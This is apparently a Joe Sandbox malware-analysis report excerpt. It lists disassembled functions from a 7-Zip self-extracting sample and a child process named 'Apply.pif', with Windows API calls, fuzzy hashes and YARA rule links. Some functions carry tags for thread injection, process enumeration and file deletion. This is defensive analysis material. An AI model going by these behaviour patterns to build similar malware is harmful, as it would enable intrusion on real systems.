SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$FocusMessageSendTextWindow
String ID:
API String ID: 3590784419-0
Opcode ID: ee964965f1595af0bd655cf5e96c1a507a195f0db555e4b92506279391280dfe
Instruction ID: f6e1cc8c7d00fb96aab07a802bf3c83ba1f2c87e2675e49942b041080251666e
Opcode Fuzzy Hash: ee964965f1595af0bd655cf5e96c1a507a195f0db555e4b92506279391280dfe
Instruction Fuzzy Hash: D5E03071A41210BBCB206BA69D89D877F1DDF853A170580B5FA09AA171C7788800DAA4

Function 0040330E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

SetEnvironment, xrefs: 004034E1

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID: SetEnvironment
API String ID: 0-360490078
Opcode ID: 0ea6591de479892366c2af27a04e983d93b3bc9cdc0b1c79ae3bd1ec7d4782a5
Instruction ID: f844d74c5fc4ce8d264c4d2ff15d3e98a65cece2ee36b5efcc8bde039da5b95a
Opcode Fuzzy Hash: 0ea6591de479892366c2af27a04e983d93b3bc9cdc0b1c79ae3bd1ec7d4782a5
Instruction Fuzzy Hash: 2481E231C00248AACF01EF95DC85AEDBF79AF15319F14407BE4017B2D2DB395A529B59

Function 00417D47 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7ee4985423cf96dede614f1951a7e9e3b1a385ff82cb90654be050e6cab35e8
Instruction ID: 3a1d156a642567a22983ba9909a2241f94cd9ca45c0d99c448d6f3703fd47455
Opcode Fuzzy Hash: d7ee4985423cf96dede614f1951a7e9e3b1a385ff82cb90654be050e6cab35e8
Instruction Fuzzy Hash: 1A312775604108AFDB04DF44D981EA97BB5EF08354F14809AFD198F362D735EE90CB99

Function 00406661 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405F99: GetDlgItem.USER32(?,?), ref: 00405FA5

Part of subcall function 0040744D: GetDlgItem.USER32(?,?), ref: 0040745C
Part of subcall function 0040744D: ShowWindow.USER32(00000000,?,?,0040645A,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00407474

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004066C4
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 004066E0
GetDlgItem.USER32(?,000004B7), ref: 004066F3
SetWindowLongW.USER32(00000000,000000FC,Function_00005953), ref: 00406701

Part of subcall function 004061CD: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 004061F0
Part of subcall function 004061CD: LoadIconW.USER32(00000000), ref: 004061F7
Part of subcall function 004061CD: GetSystemMetrics.USER32(00000032), ref: 00406209
Part of subcall function 004061CD: GetSystemMetrics.USER32(00000031), ref: 0040620E
Part of subcall function 004061CD: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 00406217
Part of subcall function 004061CD: LoadImageW.USER32(00000000), ref: 0040621E
Part of subcall function 004061CD: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040623C
Part of subcall function 004061CD: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00406249
Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 00406265
Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 00406271
Part of subcall function 004061CD: GetWindowLongW.USER32(00000000,000000F0), ref: 00406278
Part of subcall function 004061CD: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040628D
Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B5), ref: 0040629A
Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B5), ref: 004062AA
Part of subcall function 004061CD: GetWindowLongW.USER32(00000000,000000F0), ref: 004062B5
Part of subcall function 004061CD: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004062C4
Part of subcall function 004061CD: GetDlgItem.USER32(?,000004B2), ref: 004062DA

Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FBD
Part of subcall function 00406FA9: SetFocus.USER32(00000000,?,00000000,?,00405926,?), ref: 00406FC0
Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FD0
Part of subcall function 00406FA9: GetDlgItem.USER32(?,000004B6), ref: 00406FE8
Part of subcall function 00406FA9: SendMessageW.USER32(00000000,000000B1,0000002E,0000002E), ref: 00406FF2

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$HandleLoadMetricsModule$DirectoryFileFocusIconImageInfoShow
String ID:
API String ID: 2966018739-0
Opcode ID: 57897be0ac03c02ee836a2b470a9b7fc3d26ce4f1537270b2cc153723aa7b8e7
Instruction ID: 720076208a8cd8d4a611c5ecdbd6fac6abd83f3f904a645ecfe44336e6d10c83
Opcode Fuzzy Hash: 57897be0ac03c02ee836a2b470a9b7fc3d26ce4f1537270b2cc153723aa7b8e7
Instruction Fuzzy Hash: A21193B2E40315BBDB10ABA5EC49FDEB7ADEF44318F004476B605E32C1D6B8D9448B94

Function 00405D55 Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00405D7D
GetSystemMetrics.USER32(00000031), ref: 00405DA3
CreateFontIndirectW.GDI32(?), ref: 00405DB3
DeleteObject.GDI32(00000000), ref: 00405DDF

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 3d0b0b5187ec293b70e023c8666c61d0dad0b7b0987e9bc6d8a6bccd5fe4712f
Instruction ID: 589bcbddd4421325bea5a8b1de4240acc0829fea160f6e993b9073ae00d0bb15
Opcode Fuzzy Hash: 3d0b0b5187ec293b70e023c8666c61d0dad0b7b0987e9bc6d8a6bccd5fe4712f
Instruction Fuzzy Hash: 54118272940219AFEB108F58DC88AEBB7BCEF44358F05827AAC15A7291DB749D44CF54

Function 00418836 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00418850

Part of subcall function 0041879D: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 004187CC
Part of subcall function 0041879D: ___AdjustPointer.LIBCMT ref: 004187E7

_UnwindNestedFrames.LIBCMT ref: 00418865
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00418876
CallCatchBlock.LIBVCRUNTIME ref: 0041889E

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 6466acd8f6e2a874f5cc5d39f87c4e52791361ed61d3c04f63af72025866aa28
Instruction ID: 36b014ceb4145293d2653aad7e410f7cb69a81bc23da82c26d473a3497ccf736
Opcode Fuzzy Hash: 6466acd8f6e2a874f5cc5d39f87c4e52791361ed61d3c04f63af72025866aa28
Instruction Fuzzy Hash: 3B012D32100109BBDF116E96CC45EEB3B6AFF98758F44441DFE0856121D73AE8A19BA4

Function 004075F2 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,?), ref: 00407629
GetClientRect.USER32(?,?), ref: 0040763B
PtInRect.USER32(?,?,?), ref: 0040764A
CallNextHookEx.USER32(?,?,?), ref: 0040766C

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ClientRect$CallHookNextScreen
String ID:
API String ID: 1596363829-0
Opcode ID: 3801a53d40516981aaf044842e769f6fab1b7c74d9eadb141162595fcba978aa
Instruction ID: 301b4600e396e727d21cde9f58a3ec7f9b1242c7084d47dd03052232aa3ad0ee
Opcode Fuzzy Hash: 3801a53d40516981aaf044842e769f6fab1b7c74d9eadb141162595fcba978aa
Instruction Fuzzy Hash: C901A131A00005EFDB209F98CC48DEB7B66FF54394B04847AE917E21B2D735E850DB59

Function 00406FFC Relevance: 6.0, APIs: 4, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 00407017
CreateFontIndirectW.GDI32(?), ref: 0040702D
GetDlgItem.USER32(?,000004B5), ref: 00407041
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040704D

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 59dc5abfe602d22e33d1af4c5925bfcd79e5149069da3d30ac52e00f8d0f0b8b
Instruction ID: f5e65830561f8ab3637ac77171e914c0dc17c91b326b23493439a436ba14f9f4
Opcode Fuzzy Hash: 59dc5abfe602d22e33d1af4c5925bfcd79e5149069da3d30ac52e00f8d0f0b8b
Instruction Fuzzy Hash: EBF0B471940304ABD7306BE4DD09FCBBFAC9B44B45F004135BE01A21E0D7B4E4048A59

Function 0040608A Relevance: 6.0, APIs: 4, Instructions: 29threadinjectionCOMMON

Download Yara Rule

APIs

SuspendThread.KERNEL32(00000288), ref: 004060A1
ResumeThread.KERNEL32(00000288), ref: 004060BF
TerminateThread.KERNEL32(00000288,00000016), ref: 004060D4
EndDialog.USER32(?,00000000), ref: 004060DF

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Thread$DialogResumeSuspendTerminate
String ID:
API String ID: 714563131-0
Opcode ID: 5bbc28acddb10463f09857c773cc69307091f21338570d11145be6f95595fb23
Instruction ID: 8fab632199d0908ba33f8da4b7f56d172b7c011a21c29bfc308f8df5ebe47e73
Opcode Fuzzy Hash: 5bbc28acddb10463f09857c773cc69307091f21338570d11145be6f95595fb23
Instruction Fuzzy Hash: D0F08271682120A7D3319F50AC4879A7A54AF59705F0280B6E403B21E0C37948618A9D

Function 00402F83 Relevance: 6.0, APIs: 4, Instructions: 26COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00402F8A
GetWindowRect.USER32(?,?), ref: 00402F9E
ScreenToClient.USER32(00000000,?), ref: 00402FA6
ScreenToClient.USER32(00000000,?), ref: 00402FB1

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 440b82a22d2b631b071771dd8f3ba710ae7b9669c0b65887d6e1995d8e1cea06
Instruction ID: d539694b179019102c5b4c06d93f04b0f2a1111d6f57eb851fde0fc9aed182da
Opcode Fuzzy Hash: 440b82a22d2b631b071771dd8f3ba710ae7b9669c0b65887d6e1995d8e1cea06
Instruction Fuzzy Hash: CBE01A7668024ABBDB001BE2ECC8C9B7B6CFB853953008475F90981120D775D8018A64

Function 00405B4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000B), ref: 00405A61
Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000C), ref: 00405A68

GetSystemMetrics.USER32(00000007), ref: 00405B61
GetSystemMetrics.USER32(00000007), ref: 00405B72

Strings

100%% , xrefs: 00405B91, 00405B98, 00405BF4

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: MetricsSystem
String ID: 100%%
API String ID: 4116985748-568723177
Opcode ID: 334c3224572854bdfb44f3f891c5a4032f2d03a709a653b2b1f191988218ec54
Instruction ID: 98887543d5e3c7041bc36966c58c694e7cd41ec7928b3b5d14a60619b90ee756
Opcode Fuzzy Hash: 334c3224572854bdfb44f3f891c5a4032f2d03a709a653b2b1f191988218ec54
Instruction Fuzzy Hash: 09315E71600A099FDB20DF6AD9429ABBBF5EB50318B00052EE442A26A2D778F945CF59

Function 00404CF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

_wtol.API-MS-WIN-CRT-CONVERT-L1-1-0(004049F1,?,GUIFlags,00000000,004049F1,004049F1,?,00404DB8,004049F1,00421300,?,004049F1), ref: 00404D2E

Strings

GUIFlags, xrefs: 00404CF8
-, xrefs: 00404D0C

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: _wtol
String ID: -$GUIFlags
API String ID: 2131799477-4029742170
Opcode ID: 140e05111dc0fecc70a0b446918e2fdb5982cc56c53a92521d4623001a9e10b1
Instruction ID: faf9d7bdff0eaf02d7dc1ff6e6f00bb287b80595fff55fcde92ab683e3f4d987
Opcode Fuzzy Hash: 140e05111dc0fecc70a0b446918e2fdb5982cc56c53a92521d4623001a9e10b1
Instruction Fuzzy Hash: AF11E9F6600115AEEB256B08E4156BAB395DFD4751FA08037FF817B2C4E6B55E83824C

Function 00406DD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406E07
GetDlgItem.USER32(?,?), ref: 00406E28

Strings

(%d%s), xrefs: 00406E01

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Itemwsprintf
String ID: (%d%s)
API String ID: 449186261-2087557067
Opcode ID: 5a513b844bddf83d55a32313bea3597a9b6972254d320041c285dc154bd6c4a3
Instruction ID: 0855069b041fb52eadb741d1665d5d0dd14bf4d496d4cbc0dbf3efc898ddedf2
Opcode Fuzzy Hash: 5a513b844bddf83d55a32313bea3597a9b6972254d320041c285dc154bd6c4a3
Instruction Fuzzy Hash: 42F04471C00219AFCF107B95DC4AEDE77BCAF04308F1044ABB512A1192DA79A6689B59

Function 00405C49 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000B), ref: 00405A61
Part of subcall function 00405A37: GetSystemMetrics.USER32(0000000C), ref: 00405A68

GetSystemMetrics.USER32(00000007), ref: 00405C59
GetSystemMetrics.USER32(00000007), ref: 00405C6E

Strings

Z@, xrefs: 00405C92

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: MetricsSystem
String ID: Z@
API String ID: 4116985748-3535364306
Opcode ID: 16590995e6bab4cde6838fa79791c1966523c720bf2d08826403a0532f7ff5e9
Instruction ID: f59158490b789910cfc2f92da0aea55616d6536ebe6ab1582d29dafe3c8d862e
Opcode Fuzzy Hash: 16590995e6bab4cde6838fa79791c1966523c720bf2d08826403a0532f7ff5e9
Instruction Fuzzy Hash: C9F0E272E007009FD720EFB8ED49A5A37F4EB14714F00067EA402A2295DA74E9048E98

Function 00404E48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Could not allocate memory,7-Zip SFX,00000010), ref: 00404E56

Strings

Could not allocate memory, xrefs: 00404E4F
7-Zip SFX, xrefs: 00404E4A

Memory Dump Source

Source File: 00000000.00000002.2233227048.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2233203926.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233252987.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233270594.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2233291910.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_80441fcf.jbxd

Similarity

API ID: Message
String ID: 7-Zip SFX$Could not allocate memory
API String ID: 2030045667-3806377612
Opcode ID: b23f3dda782bc17cf5e308c8d3915cc8d3864c9183856bd16fd2eaca64889d71
Instruction ID: a1cde3b1e70dd50e48c68ae9573d4bf36166630aaf9194b1d0f5351cb2fcf2fd
Opcode Fuzzy Hash: b23f3dda782bc17cf5e308c8d3915cc8d3864c9183856bd16fd2eaca64889d71
Instruction Fuzzy Hash: 7AB012F0BC130032E10013604C07FC111404758F07F5084527104A80D1C6F820D0101D

Analysis Process: Apply.pifPID: 6488, Parent PID: 5960COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	52

Executed Functions

Function 00854E68 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 224
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00854E97

Part of subcall function 00857467: _wcslen.LIBCMT ref: 0085747A

GetCurrentProcess.KERNEL32(?,008EDB24,00000000,?,?), ref: 00854FAD
IsWow64Process.KERNEL32(00000000,?,?), ref: 00854FB4
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00854FDF
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00854FF1
GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00854FFF
FreeLibrary.KERNEL32(00000000,?,?), ref: 00855006
GetSystemInfo.KERNEL32(?,?,?), ref: 0085502B

Strings

kernel32.dll, xrefs: 00854FDA
GetNativeSystemInfo, xrefs: 00854FEB

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 3290436268-192647395
Opcode ID: 63d1d6abb034d02133b39af20c62d286c5ce84e79210989c0f5a04f619cbb70b
Instruction ID: 2e2632f862fee94857097e4d019577ba9cecf694d59fbd76dc5cba90e2f1280f
Opcode Fuzzy Hash: 63d1d6abb034d02133b39af20c62d286c5ce84e79210989c0f5a04f619cbb70b
Instruction Fuzzy Hash: F091C42282E3C4EFDB32DB7C7C415997FA4FB76B05B085899F480D7225D629444BEB21

Function 008BD98E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00853FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00853E0E,?,?,00892A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00854017

Part of subcall function 008BE7DA: GetFileAttributesW.KERNEL32(?,008BD57A), ref: 008BE7DB

FindFirstFileW.KERNEL32(?,?), ref: 008BDA05
DeleteFileW.KERNEL32(?,?,?,?), ref: 008BDA55
FindNextFileW.KERNEL32(00000000,00000010), ref: 008BDA66
FindClose.KERNEL32(00000000), ref: 008BDA7D
FindClose.KERNEL32(00000000), ref: 008BDA86

Strings

\*.*, xrefs: 008BD9D7

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_850000_Apply.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 9dee15532ad47193daf017f005774b0c5c70dde042759be8e069b14da2160914
Instruction ID: 2b27a6b59b142419d0e971a27a21caa6dcac846b7483b93b2fa120026f939825
Opcode Fuzzy Hash: 9dee15532ad47193daf017f005774b0c5c70dde042759be8e069b14da2160914
Instruction Fuzzy Hash: 30313031008395ABC705EB68D8918EFBBE8FE95305F445A1DF8D5D2191EB209E0DC7A3

Function 008BDAC1 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 008BDAE6
Process32FirstW.KERNEL32(00000000,?), ref: 008BDAF4
Process32NextW.KERNEL32(00000000,?), ref: 008BDB14
FindCloseChangeNotification.KERNEL32(00000000), ref: 008BDBC1

Memory Dump Source

Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true

Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
